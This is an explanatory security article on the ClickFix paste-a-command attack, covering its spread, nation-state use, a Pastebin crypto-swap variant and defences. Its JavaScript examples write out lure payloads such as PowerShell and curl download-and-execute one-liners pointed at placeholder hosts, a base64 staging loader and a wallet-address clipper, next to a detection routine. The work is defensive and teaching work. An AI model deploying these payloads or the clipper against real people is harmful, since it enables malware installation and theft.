How a social engineering technique surged over 500% in 2025, recruited nation-state hackers, and is now hijacking cryptocurrency swaps through Pastebin comments.
Somewhere right now, a person is staring at a fake error message on their screen. The prompt looks familiar—maybe a CAPTCHA, maybe a browser update, maybe a troubleshooting dialog from what appears to be Microsoft or Google. It tells them there's a problem, and it offers a fix. All they have to do is copy a command, paste it into their system terminal, and press Enter.
When they do, the malware installs itself. No drive-by download. No malicious attachment. No exploit kit. The victim did it with their own hands.
This is ClickFix, and it has become one of the defining cybersecurity threats of the past two years. What started as a niche trick deployed by a single initial access broker in early 2024 has erupted into a global phenomenon, adopted by criminal gangs and intelligence services alike, targeting individuals, enterprises, and government agencies across every major operating system.
And in its latest evolution, ClickFix is being weaponized through Pastebin comments to hijack cryptocurrency transactions in real time.
The Anatomy of a Self-Inflicted Compromise
ClickFix works by exploiting something no firewall or antivirus can fully protect against: human behavior.
Proofpoint researchers first observed the technique in March 2024, in campaigns run by the initial access broker tracked as TA571 and by the ClearFake malware distribution cluster, and published their analysis that June. They named it “ClickFix” because the malicious prompts almost always included a button labeled “Fix,” “How to fix,” or “Fix it.”
That naming choice was more than descriptive—it pointed to the psychological core of the attack. The technique exploits a deeply conditioned behavior: when users encounter what appears to be a system error with a ready-made solution, many follow the instructions without questioning the source. Years of interacting with automated repair prompts, troubleshooters, and one-click fixes across operating systems have trained users to trust these interactions. Attackers recognized this pattern and weaponized it.
The basic attack unfolds in three steps. First, the victim lands on a webpage, via a compromised legitimate site, a phishing link, or SEO poisoning, that displays what looks like a CAPTCHA check, a browser error, or a document that failed to render. Second, when the victim clicks the lure's button, the page's JavaScript writes a malicious command, typically a PowerShell one-liner or a shell pipeline, to the clipboard with navigator.clipboard.writeText(). The button is not decoration: browsers only honor that call in response to a user gesture, so the “Fix” or “I'm not a robot” click is what makes the copy possible. Third, the page instructs the victim to open a system dialog (the Windows Run box via Win+R, Terminal on macOS, or a browser console), paste, and press Enter.
In MITRE ATT&CK terms, this maps to T1204.004 (User Execution: Malicious Copy and Paste), a sub-technique added specifically to capture this pattern, combined with T1059.001 (Command and Scripting Interpreter: PowerShell) for the payload and T1189 (Drive-by Compromise) for the initial delivery.
The result is that the victim walks the payload past their own defenses. Endpoint detection, browser sandboxes, and email filters are built to stop automated malware delivery; ClickFix sidesteps them by having the user execute the payload by hand. The browser sees an ordinary clipboard write. The endpoint sees the user launch PowerShell. Neither is suspicious on its own, which is why detection has to key on the combination: explorer.exe as the parent process, a hidden window, an encoded or download-and-execute command line, and the outbound fetch that follows.
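To make the mechanics concrete, here is an added example in JavaScript; it is not code from any ClickFix kit or from the reports cited in this piece. It composes a clipboard payload the way the lure pages do, shows the single call the page's button makes, models why the victim sees only the decoy in the Run box, and recovers the real command from the clipboard text the way an analyst would. The commands, hostnames (on the reserved .invalid domain), verification IDs and file path are constructed placeholders. The same command-then-#-comment trick is what the FileFix variant discussed later in this piece relies on, so a FileFix-style sample is included alongside the Run-box and Terminal ones.

```javascript
// Added example (not from the article's sources or any ClickFix kit): a model of the
// clipboard stage. Commands, hostnames (.invalid TLD), verification IDs and the file
// path are constructed placeholders; nothing here resolves or runs anything.

// Compose the payload as ClickFix pages do: the real command, then a '#' comment
// (valid in PowerShell and in POSIX shells) carrying the text the victim expects.
function buildLurePayload(command, decoy) {
  return `${command} # ${decoy}`;
}

const SAMPLES = {
  // Fake reCAPTCHA lure aimed at the Windows Run box (Win+R).
  windowsRun: buildLurePayload(
    'powershell -w hidden -c "iwr(\'https://lure.example.invalid/stage1\')|iex"',
    '✅ "I am not a robot - reCAPTCHA Verification ID: 7624"'
  ),
  // Fake meeting-audio fix aimed at Terminal on macOS.
  macTerminal: buildLurePayload(
    'curl -fsSL https://lure.example.invalid/mac.sh | bash',
    'Google Meet audio fix - Verification ID: 3319'
  ),
  // FileFix: same trick, but the decoy is a plausible path pasted into the Explorer
  // address bar; padding spaces push the command out of the visible part of the field.
  fileFix: buildLurePayload(
    'powershell -c "iwr(\'https://lure.example.invalid/hr\')|iex"' + ' '.repeat(120),
    'C:\\company\\internal-secure\\filedrive\\HRPolicy.docx'
  ),
};

// The lure page's click handler. navigator.clipboard.writeText() is only allowed in
// response to a user gesture, which is why the page needs a button for the victim to click.
async function onFixButtonClick(payload) {
  if (typeof navigator === 'undefined' || !navigator.clipboard) return false; // e.g. under Node
  await navigator.clipboard.writeText(payload);
  return true;
}

// Simplified model of the Run box / address bar after a paste: the caret sits at the
// end of the text and the field scrolls to keep it in view, so the victim sees the
// trailing characters (the decoy), not the command in front of them.
function visibleInRunBox(payload, fieldWidth = 50) {
  return payload.length <= fieldWidth ? payload : payload.slice(-fieldWidth);
}

// Analyst side: split clipboard text into command and decoy. Only a '#' outside
// quotes starts the comment, so a '#' inside a quoted URL does not split early.
function splitPayload(payload) {
  let quote = null;
  for (let i = 0; i < payload.length; i++) {
    const ch = payload[i];
    if (quote) {
      if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") {
      quote = ch;
    } else if (ch === '#') {
      return { command: payload.slice(0, i).trim(), decoy: payload.slice(i + 1).trim() };
    }
  }
  return { command: payload.trim(), decoy: '' };
}

// A launcher up front plus reassurance words (or a document path) after the '#'
// is the ClickFix/FileFix signature.
const LAUNCHER_RE = /^(powershell|pwsh|cmd|mshta|curl|wget|bash|sh|osascript)\b/i;
const DECOY_RE = /\b(robot|captcha|verif(?:y|ication)|fix|update)\b|\.(docx|pdf|xlsx)$/i;
function looksLikeClickFix(payload) {
  const { command, decoy } = splitPayload(payload);
  return LAUNCHER_RE.test(command) && DECOY_RE.test(decoy);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const [name, payload] of Object.entries(SAMPLES)) {
    console.log(`${name}\n  victim sees: ${JSON.stringify(visibleInRunBox(payload))}`);
    console.log(`  really runs: ${splitPayload(payload).command}`);
    console.log(`  flagged: ${looksLikeClickFix(payload)}`);
  }
}
```

Run it under Node to see, for each sample, what the field shows versus what actually executes. The visible-window model is deliberately simple, a fixed number of trailing characters; the real Run box and Explorer address bar scroll to keep the caret in view after a paste, and the caret lands at the end of the pasted text, which is all the attacker needs.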
An Explosion in Scale
The numbers tell a stark story. ESET's H1 2025 Threat Report, released in June 2025, recorded a 517% rise in ClickFix detections compared with H2 2024, a figure Infosecurity Magazine repeated in its November 2025 coverage of the same telemetry. The technique accounted for nearly 8% of all attacks ESET blocked during the period, making it the second most common attack vector behind only traditional phishing.
Jiří Kropáč, Director of Threat Prevention Labs at ESET, said in a statement accompanying the report's June 2025 release: “The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors.”
The Center for Internet Security (CIS) published corroborating data in an October 2025 advisory. The CIS Cyber Threat Intelligence team, which tracked ClickFix campaigns between January and October 2025, noted that the technique comprised over a third of all non-malware alerts generated by Albert—CIS's intrusion detection system deployed across U.S. state, local, tribal, and territorial (SLTT) government networks—in the first half of 2025. The CIS team tracked campaigns that led directly to ransomware deployment, including an August 2025 Interlock ransomware incident impacting an SLTT government victim.
Separately, ReliaQuest reported in June 2025 that ClickFix was a key driver behind a 10% increase in detected drive-by compromises during the March through May 2025 period.
What makes this growth especially alarming is the democratization of the technique. ESET's report found that threat actors are now selling ClickFix builders on the dark web, providing even low-skilled attackers with weaponized landing pages ready for deployment. This trend has since accelerated: a cybercrime tool called ErrTraffic, first identified by Hudson Rock researchers on Russian-language forums in December 2025 and subsequently reported by BleepingComputer, allows threat actors to automate ClickFix attacks by generating fake visual glitches on compromised websites. Sold for a one-time purchase of $800, ErrTraffic includes OS fingerprinting, geolocation targeting, and multi-platform payload delivery across Windows, macOS, Android, and Linux. Dashboard data from active campaigns showed conversion rates approaching 60%. The barrier to entry has collapsed.
From Cybercrime to Espionage
Perhaps the clearest signal that ClickFix has moved from a fringe technique to an established weapon in the global threat landscape is its adoption by nation-state actors.
In an April 2025 report titled “Around the World in 90 Days,” Proofpoint documented how at least four state-sponsored groups incorporated ClickFix into their espionage campaigns between October 2024 and January 2025. The groups spanned three countries: North Korea's Kimsuky (tracked as TA427), Iran's MuddyWater (tracked as TA450), and two Russian groups—APT28 (TA422) and a cluster tracked as UNK_RemoteRogue.
Each group adapted ClickFix to its existing tradecraft. Kimsuky, for example, targeted individuals working on North Korean policy issues by posing as Japanese diplomatic personnel. In one documented case, TA427 operators masqueraded as a Japanese diplomat and contacted the target about arranging a meeting with Japan's ambassador to the United States. After building trust through legitimate-seeming communications, the attackers directed victims to websites that impersonated secure document-sharing platforms, where the ClickFix lure waited.
MuddyWater took a different approach, sending phishing emails from an attacker-controlled address to targets in at least 39 organizations across the Middle East. The emails masqueraded as urgent Microsoft security updates and instructed recipients to run commands that would supposedly patch a critical vulnerability.
Proofpoint noted in its analysis that while ClickFix did not revolutionize these groups' campaigns, it replaced the installation and execution stages in their existing infection chains with a method that leveraged human interaction to bypass security measures. The researchers also observed that some groups experimented with the technique in limited campaigns before returning to their standard tactics—a pattern suggesting ongoing evaluation of its operational value.
Since the Proofpoint report's publication, additional nation-state adoption has emerged. In February and March 2025, Sekoia documented Lazarus Group—a North Korean threat actor tracked separately from Kimsuky—launching “ClickFake” campaigns that used ClickFix tactics to target non-technical employees at centralized finance companies, impersonating major cryptocurrency firms including Coinbase, Kraken, and Bybit. More recently, in February 2026, Google's Mandiant researchers documented UNC1069, a North Korean threat group, using ClickFix with a spoofed Zoom meeting to deploy seven distinct macOS malware families against a cryptocurrency executive. The victim was contacted via Telegram from a compromised account of a crypto company executive, lured to a spoofed Zoom page, and then directed to follow troubleshooting steps for fake audio issues that initiated the infection chain.
Microsoft's own security team published a comprehensive analysis in August 2025 titled “Think Before You Click(Fix),” documenting campaigns they identified targeting organizations in government, finance, transportation, and education across Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico. The campaigns delivered Lampion malware, an infostealer focused on banking information, and as of the publication date, remained active.
The Pastebin Crypto Swap Attack
While ClickFix has been deployed through dozens of different lures—fake CAPTCHAs, browser errors, meeting invitations, Windows update screens—one of its more recent and technically interesting variants targets cryptocurrency users through Pastebin comments.
As reported by BleepingComputer in February 2026, threat actors are distributing ClickFix-style attacks through Pastebin, tricking cryptocurrency users into executing malicious JavaScript in their browser that hijacks Bitcoin swap transactions and redirects funds to attacker-controlled wallets. The campaign uses social engineering that promises large profits from a supposed arbitrage exploit on the Swapzone.io cryptocurrency exchange aggregator.
A detailed technical analysis published by BeyondMachines broke down the mechanics. Posts advertised as a “Crypto Exchange profit method” link to a Google Drive document presented as an “exploit guide.” The document offers a fake technical explanation of a supposed backend vulnerability in ChangeNOW, a real exchange, promising roughly 37% profit on each cryptocurrency conversion. The instructions describe a “simple program” that users need to run.
The instructions tell victims to navigate to Swapzone.io, type javascript: into the browser's address bar by hand (browsers strip that prefix from pasted text precisely to stop this kind of self-inflicted script injection), and then paste the script the attackers provide after it. What actually happens is far from simple. The script contains a URL with a base64-encoded string hidden in its path. It extracts that string, decodes it to the address of the real payload, fetches the code from that server, and executes it.
The BeyondMachines analysis found that the decoded payload contains multiple attack vectors working in concert. Functions modify the displayed exchange rates and amounts on the Swapzone interface to show the fake 37% profit increase. Meanwhile, clipboard hijacking silently replaces any copied wallet addresses with attacker-controlled addresses. The victim sees inflated exchange rates, believes the exploit is working, and initiates a swap—sending their cryptocurrency directly to the attacker.
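The following is an added example, written for this article rather than taken from the BleepingComputer or BeyondMachines write-ups, that models the pieces the Pastebin payload chains together: the loader's base64-in-the-path staging, the clipper that rewrites copied wallet addresses, and the check a user could make before sending. The staging host, stage-two URL and wallet addresses are constructed placeholders on the reserved .invalid domain; nothing is fetched or executed.

```javascript
// Added example (not from the BleepingComputer or BeyondMachines write-ups): a model of
// the Pastebin swap payload. Hosts (.invalid TLD), URLs and wallet addresses are
// constructed placeholders; nothing is fetched or executed.

// Stage two: where the real payload lives. The loader the victim pastes after
// "javascript:" never names it directly; it hides it, base64url-encoded, in the path
// of an innocuous-looking URL.
const STAGE2_URL = 'https://stage.example.invalid/swap.js';
const LOADER_URL = 'https://cdn.example.invalid/assets/' +
  Buffer.from(STAGE2_URL, 'utf8').toString('base64url') + '/bundle.min.js';

// Walk the path segments and return the first that decodes to an http(s) URL.
// A real loader would then fetch() it and eval() the body; that part is omitted.
function extractStagedUrl(url) {
  for (const seg of new URL(url).pathname.split('/')) {
    if (seg.length < 12 || !/^[A-Za-z0-9_-]+$/.test(seg)) continue;
    const decoded = Buffer.from(seg, 'base64url').toString('utf8');
    if (/^https?:\/\/\S+$/.test(decoded)) return decoded;
  }
  return null;
}

// Clipper: rewrite any Bitcoin (legacy or bech32) or Ethereum-style address in the
// text being copied, so what the victim pastes into the swap form is the attacker's.
// The regex is deliberately loose; a clipper would rather over-match than miss.
const ADDRESS_RE = /\b(?:bc1[a-z0-9]{25,87}|[13][a-km-zA-HJ-NP-Z1-9]{25,34}|0x[a-fA-F0-9]{40})\b/g;
const ATTACKER = { btc: 'bc1q' + 'attacker'.padEnd(38, '7'), eth: '0x' + 'ab'.repeat(20) }; // constructed

function clipperRewrite(copiedText) {
  return copiedText.replace(ADDRESS_RE, (addr) => (addr.startsWith('0x') ? ATTACKER.eth : ATTACKER.btc));
}

// The check the victim never makes: does what I am about to paste equal what I copied?
function clipboardTampered(copied, pasted) {
  return copied.trim() !== pasted.trim();
}

const VICTIM_BTC = 'bc1q' + 'victim'.padEnd(38, '0'); // constructed

if (typeof require !== 'undefined' && require.main === module) {
  console.log('stage two:', extractStagedUrl(LOADER_URL));
  const copied = `Send 0.5 BTC to ${VICTIM_BTC}`;
  const pasted = clipperRewrite(copied);
  console.log('copied   :', copied);
  console.log('pasted   :', pasted);
  console.log('tampered :', clipboardTampered(copied, pasted));
}
```

Two things are worth noticing. The loader is small and looks like nothing because the interesting part is encoded in a path segment, so anyone skimming the pasted script sees a CDN-looking URL rather than the staging server. And clipperRewrite depends on nothing more than a broad regex and the habit of pasting a 40-odd-character address without reading it back; the rate tampering described above exists only to make sure the victim proceeds to that paste. The defender check is the same habit in reverse: compare the first and last few characters of what you paste with what you copied, every time.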
The scam's social engineering is particularly effective because it exploits greed rather than fear. Unlike typical ClickFix lures that create urgency around a fake problem, this variant appeals to the victim's desire to profit from someone else's vulnerability. As the BeyondMachines researchers pointed out, the premise collapses under basic scrutiny: a 37% rate discrepancy would be detected within minutes by professional arbitrage traders, the technical explanation involving “Node v1.9” is architecturally nonsensical, and anyone who actually discovered such a flaw would simply exploit it themselves rather than sharing it with strangers on Pastebin.
This crypto-targeting variant is emerging within a broader context of industrial-scale cryptocurrency fraud. According to Chainalysis's 2026 Crypto Crime Report, an estimated $14 billion in cryptocurrency was received by scam-linked addresses on-chain in 2025, with the firm projecting the total could exceed $17 billion as additional illicit wallets are identified—consistent with their historical reporting patterns where estimates grow by an average of 24% between reporting periods. Impersonation scams posted a staggering 1,400% year-over-year growth, and the firm found that AI-enabled scams were 4.5 times more profitable than traditional scams. The average scam payment increased from $782 in 2024 to $2,764 in 2025.
The Expanding Attack Surface
ClickFix has not remained confined to Windows. ESET's H1 2025 report explicitly noted that the technique affects all major operating systems, including Windows, Linux, and macOS. While Windows remains the primary target, the cross-platform expansion represents a significant escalation in the threat's reach.
Campaigns targeting macOS users gained particular momentum in 2025. Sekoia had documented macOS-targeting ClickFix campaigns as early as late 2024 through fake Google Meet pages distributing infostealers. By mid-2025, the campaigns had grown more sophisticated. CloudSEK identified a campaign impersonating Spectrum, a U.S. telecommunications provider, that used ClickFix to deliver the Atomic macOS Stealer (AMOS) infostealer through typosquatted domains. Microsoft subsequently documented the same campaign cluster in their August 2025 analysis, noting that the delivery pages contained implementation errors—including displaying Windows-specific instructions to macOS users—suggesting hastily assembled infrastructure.
Linux targeting, while less extensively documented in public reporting, represents an underappreciated risk. Enterprise servers, developer workstations, and cloud environments running Linux could be targeted through ClickFix lures that instruct users to paste commands into terminal emulators. ErrTraffic explicitly includes Linux payload delivery, and the same social engineering principles that work against Windows and macOS users apply equally to Linux administrators accustomed to executing commands in the shell.
In February 2026, BleepingComputer reported that threat actors were abusing Claude AI artifacts and Google Ads in ClickFix campaigns delivering infostealer malware to macOS users searching for specific queries. Moonlock Lab and AdGuard researchers found that over 10,000 users had accessed the malicious content, which was hosted on the claude.ai domain. The campaign demonstrated that the technique continues to evolve across both platforms and delivery mechanisms, with attackers leveraging trusted AI platforms to host malicious instructions that appear legitimate.
The technique has also spawned variants. In June 2025, security researcher mr.d0x introduced FileFix, a stealthier evolution that moves the paste from the Windows Run dialog to the File Explorer address bar. A malicious webpage opens a legitimate Explorer window through the HTML <input type="file"> element and, on that same click, copies a disguised PowerShell command to the clipboard. The victim is told to paste what looks like a file path into the address bar. The pasted string is actually the command, then a run of padding spaces, then a # comment character and a plausible file path; the field shows only the tail, so the victim sees a benign path while Explorer hands the whole string to PowerShell.
Check Point Research observed threat actors actively testing FileFix in real-world campaigns within two weeks of its public disclosure, identifying a phishing domain registered on July 6, 2025 that deployed FileFix scripts.
Other variants include TerminalFix, which walks users into opening a native shell application themselves, and DownloadFix, which uses different pretexts to get users to download and run malicious files. A variant called ConsentFix, reported by BleepingComputer, abuses the Azure CLI OAuth app to take over Microsoft accounts without ever capturing a password or having to defeat multi-factor authentication: the victim's own consent hands the attacker a token. That is a significant escalation beyond credential theft, direct account takeover through OAuth consent phishing. Each variant exploits the same core weakness: user trust in routine system interactions.
Defense Strategies
Defending against ClickFix requires a layered approach that addresses both the technical and human dimensions of the attack.
On the technical side, the CIS advisory gives a starting point: restrict PowerShell for standard users by setting the execution policy to AllSigned or Restricted through Group Policy, so that only signed script files run. Treat that as a speed bump rather than a boundary, though. Execution policy governs .ps1 files, not inline commands, and the pasted one-liner in a ClickFix lure (powershell -w hidden -c ..., or -EncodedCommand with a base64 blob) runs regardless of it. The controls that actually stop the launch are AppLocker or Windows Defender Application Control (WDAC) rules that block powershell.exe and pwsh.exe for users who have no business running them; an enforced WDAC policy also drops PowerShell into Constrained Language Mode for anything the policy does not explicitly allow, which disables most download cradles even where the interpreter itself is permitted. Configure UAC to prompt for administrative credentials on elevation rather than a consent click, so a payload that needs higher privileges cannot get them from a user who is already in the habit of clicking through. Disabling the Run dialog through Group Policy (the Remove Run menu from Start Menu setting, which also blocks Win+R) closes the most common lure path, but not the File Explorer, Terminal, or browser-console variants.
Beyond PowerShell hardening, block execution from user-writable directories (AppLocker's default rules already do this) and restrict the living-off-the-land binaries (LOLBins) that ClickFix chains use as launchers. mshta.exe is the primary concern: it executes HTML Applications (.hta files), will take a URL as its argument, and shows up as the first-stage launcher in many ClickFix and FileFix chains. Blocking mshta.exe removes one of the more dangerous execution paths; curl.exe, certutil.exe and bitsadmin.exe deserve the same scrutiny where standard users do not need them.
For SIEM platforms, detection engineers including Florian Roth of Nextron Systems have published Sigma rules for the ClickFix pattern: explorer.exe spawning mshta.exe, powershell.exe launched with hidden-window, execution-policy-bypass or encoded-command switches, and PowerShell started from the Run dialog, which likewise appears as a child of explorer.exe. Those rules depend on command lines being logged, so enable command-line auditing for event 4688 or deploy Sysmon, and turn on PowerShell Module, Script Block and Transcription logging; Script Block logging (event 4104) records the decoded contents of an encoded command, which is what you will need when reconstructing what actually ran. One cheap, high-fidelity addition: the decoy comment the lure appends (“not a robot,” “Verification ID”) is passed to the interpreter as part of the command line, so it lands in the same telemetry and can be searched for directly.
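As an added example (written here, not the CIS advisory's guidance or Nextron's published rules), this is the logic those Sigma rules express, in JavaScript, run over constructed process-creation events shaped like Sysmon Event ID 1 or Windows 4688 records with command-line auditing on. The image and parent paths, URLs and verification ID in the sample events are invented; the encoded command is generated inside the block so the decoder can be checked against it.

```javascript
// Added example (not the CIS advisory's guidance or Nextron's published Sigma rules):
// the parent/child and command-line checks those rules encode, applied to constructed
// process-creation events. Paths, URLs and the verification ID are invented.

const LAUNCHERS = new Set(['powershell.exe', 'pwsh.exe', 'mshta.exe', 'cmd.exe', 'wscript.exe', 'cscript.exe', 'curl.exe']);
// The Run box (Win+R) and the Explorer address bar both spawn children of explorer.exe.
const INTERACTIVE_PARENT = 'explorer.exe';

const baseName = (p) => p.split(/[\\/]/).pop().toLowerCase();

// -e / -ec / -enc / -EncodedCommand takes base64 of UTF-16LE text. Returns null if absent.
function decodeEncodedCommand(cmdline) {
  const m = /-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})/i.exec(cmdline);
  return m ? Buffer.from(m[1], 'base64').toString('utf16le') : null;
}

const INDICATORS = [
  ['hidden_window', /-w(?:indowstyle)?\s+h(?:idden)?\b/i],
  ['noprofile_or_bypass', /-(?:nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)\b/i],
  ['download_cradle', /\b(?:iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression|downloadstring)\b/i],
  ['mshta_remote', /mshta(?:\.exe)?\s+["']?https?:\/\//i],
  ['decoy_comment', /#.*\b(?:robot|captcha|verif(?:y|ication))\b/i],
];

// Score one event: which indicators fire, plus the decoded command if one was encoded.
// The decoded text is scanned too, so an encoded download cradle still counts.
function scoreEvent(evt) {
  const hits = [];
  if (!LAUNCHERS.has(baseName(evt.Image))) return { hits, decoded: null };
  if (baseName(evt.ParentImage) === INTERACTIVE_PARENT) hits.push('explorer_parent');
  const decoded = decodeEncodedCommand(evt.CommandLine);
  if (decoded !== null) hits.push('encoded_command');
  const text = decoded !== null ? `${evt.CommandLine}\n${decoded}` : evt.CommandLine;
  for (const [name, re] of INDICATORS) if (re.test(text)) hits.push(name);
  return { hits, decoded };
}

// Alert on an explorer.exe parent plus any other indicator, or on three stacked
// indicators from any parent (a launcher chained through cmd.exe, for instance).
function detectClickFix(events) {
  const alerts = [];
  for (const evt of events) {
    const { hits, decoded } = scoreEvent(evt);
    const interactive = hits.includes('explorer_parent');
    if ((interactive && hits.length >= 2) || hits.length >= 3) {
      alerts.push({ image: baseName(evt.Image), parent: baseName(evt.ParentImage), hits, decoded });
    }
  }
  return alerts;
}

// Constructed events in Sysmon Event ID 1 / Windows 4688 shape. The encoded command is
// generated here so the decoder can be checked against it.
const ENCODED_CMD = 'iwr https://lure.example.invalid/s2|iex';
const SAMPLE_EVENTS = [
  { ParentImage: 'C:\\Windows\\explorer.exe', Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    CommandLine: 'powershell -w hidden -c "iwr(\'https://lure.example.invalid/s1\')|iex" # ✅ I am not a robot - reCAPTCHA Verification ID: 7624' },
  { ParentImage: 'C:\\Windows\\explorer.exe', Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    CommandLine: 'powershell -nop -w hidden -enc ' + Buffer.from(ENCODED_CMD, 'utf16le').toString('base64') },
  { ParentImage: 'C:\\Windows\\explorer.exe', Image: 'C:\\Windows\\System32\\mshta.exe',
    CommandLine: 'mshta https://lure.example.invalid/x.hta' },
  { ParentImage: 'C:\\Users\\admin\\AppData\\Local\\Microsoft\\WindowsApps\\wt.exe', Image: 'C:\\Program Files\\PowerShell\\7\\pwsh.exe',
    CommandLine: 'pwsh -NoProfile -File C:\\scripts\\backup.ps1' }, // routine admin work, should not alert
  { ParentImage: 'C:\\Windows\\explorer.exe', Image: 'C:\\Windows\\System32\\notepad.exe',
    CommandLine: 'notepad.exe C:\\Users\\admin\\notes.txt' },
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const alert of detectClickFix(SAMPLE_EVENTS)) console.log(alert);
}
```

Two things to notice when you run it. The decoy comment travels with the command line, so the words the lure uses to reassure the victim end up in process telemetry and the decoy_comment indicator fires on nothing more than a substring search. And the administrative launch from a terminal scores a single indicator, not enough to alert, which is the trade-off every ClickFix rule makes: pwsh.exe with -NoProfile is routine; powershell.exe with a hidden window, an encoded command and explorer.exe as the parent is not.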
Darktrace, in a June 2025 case study, demonstrated how anomaly-based detection could identify ClickFix activity after initial access by detecting unusual PowerShell user agents, unexpected external communications, and data exfiltration patterns—even when the initial compromise occurred outside the organization's visibility.
Technical controls alone are insufficient, because the defining feature of ClickFix is that the victim is an active participant in their own compromise: each step, taken in isolation, looks like ordinary use. That makes user awareness training more important here than for most techniques, and the message should be specific: no legitimate website, software update, or verification process will ever require you to open a system terminal and paste a command.
If a webpage asks you to open Run, Terminal, or a browser console, close the page and report it. This principle should be reinforced in security awareness training with the same emphasis given to phishing link identification.
For cryptocurrency users specifically, the Pastebin swap variant carries a clear lesson: if a stranger is sharing an exploit that supposedly generates free money, you are the target, not the beneficiary. No real vulnerability gets broadcast on Pastebin. Arbitrage discrepancies of 37% do not survive undetected. And typing javascript: into your browser's address bar to run untrusted code on an exchange's page is handing your wallet to whoever wrote that code.
What Comes Next
ClickFix represents a fundamental shift in attacker methodology. Rather than fighting endpoint security tools head-on, attackers have found it more efficient to recruit users as unwitting accomplices. The technique's growth trajectory, its adoption by nation-state groups across three countries within a single quarter, the emergence of commercial builders and automation tools like ErrTraffic, and the proliferation of variant techniques all point to a threat that is still in its expansion phase.
The proliferation of ClickFix also reflects a broader trend visible in the Chainalysis data: crypto crime is no longer primarily about technical exploits. It is increasingly about deception sophisticated enough to bypass human skepticism. Scams now rely on something harder to patch than a vulnerable smart contract: human trust.
As long as people can be convinced to paste a command they do not understand into a prompt they should not have opened, ClickFix and its descendants will continue to find victims. The defense starts with a single principle: no legitimate service will ever ask you to fix a problem by running a command you copied from a webpage. If it does, the only thing that needs fixing is your browser tab—close it.
Proofpoint, “Around the World in 90 Days: State-Sponsored Actors Try ClickFix” (April 2025)
Proofpoint, “From Clipboard to Compromise: A PowerShell Self-Pwn” (June 2024)
ESET, H1 2025 Threat Report (June 2025)
Infosecurity Magazine, “ClickFix Attacks Surge 517% in 2025” (November 2025)
Microsoft Security Blog, “Think Before You Click(Fix)” (August 2025)
Center for Internet Security, “ClickFix: An Adaptive Social Engineering Technique” (October 2025)
BleepingComputer, “Pastebin comments push ClickFix JavaScript attack to hijack crypto swaps” (February 2026)
BeyondMachines, “Cryptocurrency theft through a program that victims need to run” (August 2025)
Chainalysis, 2026 Crypto Crime Report (January 2026)
Check Point Research, “FileFix: The New Social Engineering Attack Building on ClickFix Tested in the Wild” (July 2025)
Darktrace, “Unpacking ClickFix: Detection Insights” (June 2025)
Field Effect, “ClickFix: The Rising Threat of Social Engineering Through Fake Fixes” (March 2025)
Sekoia, “ClickFix Tactic: The Phantom Meet” (October 2024)
BleepingComputer, “Claude LLM artifacts abused to push Mac infostealers in ClickFix attack” (February 2026)
CloudSEK, “AMOS Variant Distributed Via ClickFix in Spectrum-Themed Dynamic Delivery Campaign” (August 2025)
Sekoia, “From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic” (March 2025)
Google Mandiant, “UNC1069 macOS Malware Campaign” (February 2026)
Huntress, “Don't Sweat the ClickFix Techniques: Variants & Detection Evolution” (2025)
BleepingComputer, “ConsentFix variant abuses Azure CLI OAuth” (2025)
Hudson Rock, “The Industrialization of ClickFix: Inside ErrTraffic” (December 2025)
CISA/FBI/HHS/MS-ISAC, “#StopRansomware: Interlock,” AA25-203A (July 2025)